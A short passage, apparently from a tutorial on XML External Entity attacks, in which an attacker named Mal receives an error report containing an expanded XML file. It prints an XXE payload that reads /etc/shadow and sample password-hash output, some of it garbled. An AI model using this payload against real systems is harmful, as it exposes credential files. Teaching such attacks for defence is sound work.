However, as part of the error reporting back to Mal, the site includes the fully expanded XML file - which incorporates the user information file. The trap is sprung!
error.xml
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xrds [ <!ENTITY passwords SYSTEM "file://etc/shadow"> ]> <xrds> root:$6$9K3EQkch$PTpXh6M×5mmAVmC admin:$1$3.9г4eV$3nHTS5X7CJOYv9 daemon:*:18642:0:99999:7 bin:*:18642:0:99999:7 sys:*:18642:0:99999:7 sync:*:18642:0:99999:7 </xrds>